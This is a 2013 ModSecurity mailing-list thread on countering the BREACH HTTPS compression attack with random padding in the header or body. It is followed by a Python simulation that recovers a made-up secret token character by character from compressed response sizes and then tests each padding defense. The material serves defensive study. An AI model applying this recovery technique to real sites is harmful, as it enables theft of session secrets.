Brian,

Thanks for the comments. I'm interested too :-)
For now, as it's a hobby project for me, I'm trying to get a working mod_headers/mod_security setup to test it out ;-)

Cheers,

Hans

On 9-8-2013 15:54, Brian Rectanus wrote:
Although, replying to myself here, adding x's to the header may still work OK, as you will not have to worry about the x's being compressed (negating the size fluctuation) when adjusting the payload size (provided SSL compression is disabled, which you should be doing to mitigate).  I'd be interested to hear about your success with this (or lack thereof, heh).

-B


On Fri, Aug 9, 2013 at 6:28 AM, Brian Rectanus <brectanu@gmail.com> wrote:
I believe the issue is HTTP compression, not that the attacker can see the payload.  Compression is performed only on the body in HTTP, which is why matching guesses make the response smaller.  That is, if your guess matches bytes in the body, then the compression ratio is higher (payload smaller) due to the similar bytes of a correct guess.

In addition, to make this work well, you need to inject arbitrary bytes, not just x's.  You need some, but not all the random bytes to match the secret so that the compressed size fluctuates enough to render the attack much more difficult.

It is an interesting idea.  I'd suggest adding a much larger payload of random bytes that match the secret that you are trying to protect.

Cheers,
-B



On Fri, Aug 9, 2013 at 12:04 AM, hans.klunder@xs4all.nl <hans.klunder@xs4all.nl> wrote:
Christian,

I might be wrong, but if the MITM is able to separate the HTTP response
body from the HTTP header then he has already broken the SSL tunnel. So
why bother trying to guess the content then when the attacker can read
it in plain text ?

The way I read it, the attacker has access to another part of the
browser (window, iframe) and is able to inject calls to the target site,
but is not able to view the secured data. Therefore he also needs to be
able to intercept the SSL payload and compare it to the spoofed payload.
And since header and body travel together it should not matter whether
the random bytes are added to header or body.

But again I could be wrong ;-)

Cheers,
Hans
ps. if the attacker is already in the middle and is able to instruct the
browser, he can also instruct the browser to download a trojan, but that's
a different topic ;-)




On 9-8-2013 8:32, Christian Folini wrote:
> Hey Hans,
>
> On Fri, August 9, 2013 7:21 am, hans.klunder@xs4all.nl wrote:
>> You are right that the header won't affect the content length of the body.
>> However if I read the description of the attack
>> (http://www.kb.cert.org/vuls/id/987798) then the man in the middle
>> checks the size of the SSL payload, not the body content length.
> That is not correct.
>
> The description notes:
> "To recover a particular secret in an HTTPS response body, the attacker
> guesses character by character, sending a pair of requests for each guess.
> The correct guess will result in a smaller HTTPS response."
>
> But your initial idea is still valid. You just need to inject your random
> content in the response body and among the headers.
>
> Ahoj,
>
> Christian
>
>
>
>> As the header is part of the SSL payload, varying the header would alter
>> the SSL payload size and therefore blind the MITM :-)
>>
>> Cheers,
>>
>> Hans
>>
>> On 7-8-2013 23:27, Josh Amishav-Zlatin wrote:
>>> On Wed, Aug 7, 2013 at 11:02 PM, hans.klunder@xs4all.nl <hans.klunder@xs4all.nl> wrote:
>>>
>>>      Josh,
>>>
>>>      thanks for your answer.
>>>
>>>      The number of x's should be random (say between 1 and 80) to
>>>      ensure that the response size differs (its an attempt to tackle
>>>      the BREACH SSL attack ;-))
>>>
>>>
>>> Hi Hans,
>>>
>>> I may be completely off, but injecting a random header value does not
>>> affect the content-length value. I think you need to inject a random
>>> number of bytes into the response body.
>>>
>>> --
>>>   - Josh
>>>
>>>
>>>      The setenv seems to be doable by exec-ing a lua script, but I was
>>>      wondering if there was a cleaner way.
>>>
>>>      Cheers,
>>>
>>>      Hans
>>>
>>>
>>>
>>>
>>>      On 7-8-2013 21:38, Josh Amishav-Zlatin wrote:
>>>>      On Wed, Aug 7, 2013 at 7:30 PM, hans.klunder@xs4all.nl <hans.klunder@xs4all.nl> wrote:
>>>>
>>>>          Hi,
>>>>
>>>>          I'm rather new to mod_security
>>>>
>>>>          I'd like to insert a variable sized header on responses
>>>>
>>>>          e.g:
>>>>          X-padding: xxxx
>>>>          or
>>>>          X-padding: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
>>>>          etc
>>>>
>>>>          where the number of x's randomly differs per response.
>>>>
>>>>          Is this possible with a standard rule or would I need to
>>>>          define a custom
>>>>          function for this ?
>>>>
>>>>
>>>>      Hi Hans,
>>>>
>>>>      How do you decide how many x's are appropriate for each response?
>>>>      Depending on the implementation, you could use a combination of
>>>>      the ModSecurity setenv action and a ModHeaders rule to inject the
>>>>      header.
>>>>
>>>>      --
>>>>       - Josh
>>>>
>>>>
>>>>          KR,
>>>>          Hans
>>>>
>>>
_______________________________________________
mod-security-users mailing list
mod-security-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/
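The back-and-forth above can be made concrete with a small simulation. The Python below is an added example for this page; it is not code from the thread, from ModSecurity or from the BREACH authors. The page, the secret token, the header set and the 1..80 padding range are constructed for illustration (the range is the one Hans proposed). The script reproduces the oracle Brian and Christian describe: a gzip'd body that reflects attacker input next to a secret, guessed one character at a time with the "two tries" comparison from the BREACH paper (the alignment filler added to it is my own, and is labelled as such in the code). It then plugs in the two padding ideas: a random-length X-Padding header, and random bytes drawn from the token's own alphabet inside the body.

```python
"""Simulation of the compression side channel (BREACH) discussed in this
thread and of the two padding ideas, random header bytes vs. random body
bytes.  Constructed example: the page, the secret token, the header set
and the 1..80 padding range are made up for illustration; nothing here
is taken from a real site or from ModSecurity."""
import random
import zlib

SECRET_TOKEN = "7f3a9c2e1b"       # hypothetical per-session token in the page
KNOWN_PREFIX = 'csrftoken="'      # text the attacker knows sits right before it
ALPHABET = "0123456789abcdef"     # hypothetical token alphabet
HEADERS = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
           b"Content-Encoding: gzip\r\n")


def build_body(reflected: bytes, body_padding: bytes = b"") -> bytes:
    """Response body that echoes attacker-chosen input and also carries the
    secret; with gzip on top, that is all BREACH needs."""
    return (b"<html><body>\n<p>No results for: " + reflected + b"</p>\n"
            + b"<script>var " + KNOWN_PREFIX.encode() + SECRET_TOKEN.encode()
            + b'";</script>\n' + body_padding + b"</body></html>\n")


def compressed_length(body: bytes) -> int:
    """Size of the gzip'd body, the only part of the response HTTP compresses.
    zlib's framing differs from gzip's by a constant, which cancels out."""
    return len(zlib.compress(body, 6))


def observed_length(body: bytes, header_pad: int = 0) -> int:
    """Bytes an on-path observer sees for one response: the headers (never
    compressed in HTTP/1.1; TLS compression assumed off, as Brian notes)
    plus the compressed body.  Constant TLS record framing is ignored."""
    pad = (b"X-Padding: " + b"x" * header_pad + b"\r\n") if header_pad else b""
    return len(HEADERS) + len(pad) + len(b"\r\n") + compressed_length(body)


def two_tries(known: str, guess: str, header_pad=lambda: 0, body_pad=lambda: b"") -> int:
    """'Two tries' from the BREACH paper: the guess is sent once with a
    separator after it and once with the separator before it.  Only a
    correct guess lets the LZ77 back-reference to the secret grow by one
    byte in the first form, so that response is smaller; a wrong guess
    yields the same symbols in both forms and scores exactly 0.  The
    trailing filler of distinct 9-bit literals is an added alignment trick
    (not from the paper): DEFLATE output is rounded to whole bytes, so the
    saving is shifted bit by bit until it shows up as a byte.  header_pad
    and body_pad inject the padding under test into every response."""
    prefix = (KNOWN_PREFIX + known).encode()
    g = guess.encode()
    total = 0
    for k in range(4):
        filler = bytes(range(0xF0, 0xF0 + k))
        first = build_body(prefix + g + b"{}" + filler, body_pad())
        second = build_body(prefix + b"{}" + g + filler, body_pad())
        total += observed_length(second, header_pad()) - observed_length(first, header_pad())
    return total


def recover_token(**pads) -> str:
    """Character-by-character recovery: keep the best-scoring guess each round."""
    known = ""
    while len(known) < len(SECRET_TOKEN):
        known += max(ALPHABET, key=lambda c: two_tries(known, c, **pads))
    return known


def header_padder(seed: int):
    """Random-length X-Padding header, the 1..80 x's proposed in the thread.
    Seeded only so the demo is reproducible; real padding needs os.urandom."""
    rng = random.Random(seed)
    return lambda: rng.randint(1, 80)


def body_padder(seed: int):
    """Random-length HTML comment of bytes drawn from the token's own
    alphabet, i.e. Brian's chaff that partly matches the secret."""
    rng = random.Random(seed)
    return lambda: (b"<!-- "
                    + "".join(rng.choice(ALPHABET) for _ in range(rng.randint(1, 80))).encode()
                    + b" -->\n")


if __name__ == "__main__":
    print("no padding     :", recover_token())
    print("header padding :", recover_token(header_pad=header_padder(1)))
    print("body padding   :", recover_token(body_pad=body_padder(1)))
    # The caveat: padding adds noise, not a fixed offset, so averaging many
    # responses brings the gap back (a real attacker just sends more).
    hp = header_padder(2)

    def mean_score(c, n=5000):
        return sum(two_tries("", c, header_pad=hp) for _ in range(n)) / n

    print("averaged score, correct vs wrong:", mean_score(SECRET_TOKEN[0]), mean_score("8"))
```

Run as a script, the unpadded run recovers the token outright, and either padding makes a single-shot recovery fail, which is what the thread hopes for. Two things the code makes visible that the discussion only circles: compressed_length is untouched by header padding (Josh's point), while observed_length is perturbed by it as long as the header bytes are not themselves compressed (Brian's second message), so the choice between header and body padding is about where the random size lands, not about whether the attacker can see it. The last lines show the caveat a practitioner needs: random padding of fixed distribution only adds noise, so the gap between the correct and a wrong guess reappears once a few thousand responses are averaged. It raises the attacker's request count; it does not close the side channel.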